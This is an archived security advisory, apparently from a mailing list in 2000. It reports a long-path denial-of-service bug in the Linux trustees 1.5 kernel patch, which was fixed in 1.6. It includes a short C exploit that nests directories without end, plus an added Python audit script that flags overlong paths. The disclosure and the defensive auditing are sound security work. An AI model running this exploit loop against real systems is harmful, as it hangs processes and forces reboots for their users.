linux trustees 1.5 long path name vulnerability


Date: Mon, 10 Apr 2000 14:20:59 +0400
From: "Andrey E. Lerman" <[email protected]>
To: [email protected]
Subject: linux trustees 1.5 long path name vulnerability

Linux trustees is a kernel patch that provides Netware-like
permissions to Linux. It is not in the kernel by default.

For more information see the project's website at
http://www.braysystems.com/linux/trustees.html

Problem description:
When a file or directory with a very long path is accessed, the
process hangs in an unkillable state. Any other process that then
tries to access the unkillable process's /proc entry segfaults,
so system utilities such as ps, w, top, killall and the like
stop working. Apart from that, the system continues to
function normally. The only solution is a reboot.

The only version tested is trustees 1.5 for linux 2.2.14, but
it seems that other versions of linux trustees <1.6 are vulnerable.

I'm not sure if this vulnerability is only a local DoS. It may
be possible to overwrite the process' structures in the
kernel, causing privilege elevation. I haven't investigated
that possibility yet, so I may be wrong. Servers with an open ftp
incoming directory, nfs or samba shares are at risk too.

Status:
This problem is fixed in linux trustees 1.6, available for
linux 2.2.14 and 2.3.99. Thanks to the author of the package,
Vyacheslav Zavadsky, for a quick response.

Exploit:
#include <stdio.h>
#include <stdlib.h>	/* exit() */
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{

while(1) {
	if(mkdir("aaaa",0777)<0) {
		perror("mkdir");
		exit(1);
		}
	if(chdir("aaaa")<0) {
		perror("chdir");
		exit(1);
		}
	}

return(0);
}
-- END --
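
An added audit example, not part of the original advisory: a Python walker that reports directories under a writable tree (such as the ftp incoming directory or the shares mentioned above) whose path length or nesting depth exceeds a limit. The function name and the 4096-byte and 256-level limits are assumptions; the advisory gives no threshold for "very long".

```python
import os
import sys

PATH_MAX = 4096   # assumed limit: Linux PATH_MAX, in bytes
MAX_DEPTH = 256   # assumed policy ceiling; also bounds open descriptors


def find_overlong_dirs(root, max_bytes=PATH_MAX, max_depth=MAX_DEPTH):
    """Return [(path_bytes, depth, dirpath)] for directories under root whose
    path length or nesting depth exceeds the limits.

    os.fwalk opens every directory relative to its parent's descriptor, so
    the walk never passes the kernel more than one path component at a time
    and keeps working on trees that path-based tools can no longer open.
    """
    root = os.path.abspath(root)
    prefix = root.rstrip(os.sep)
    findings = []
    for dirpath, dirnames, _files, _fd in os.fwalk(root, follow_symlinks=False):
        nbytes = len(os.fsencode(dirpath))
        depth = 0 if dirpath == root else dirpath[len(prefix):].count(os.sep)
        if nbytes > max_bytes or depth > max_depth:
            findings.append((nbytes, depth, dirpath))
            dirnames[:] = []   # prune: this subtree is already reported
    return findings


if __name__ == "__main__":
    # Usage: script.py <directory to audit>
    for nbytes, depth, path in find_overlong_dirs(sys.argv[1]):
        # Print only the head of the path; the full string may be huge.
        print(f"{nbytes} bytes, depth {depth}: {path[:120]}...")
```
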
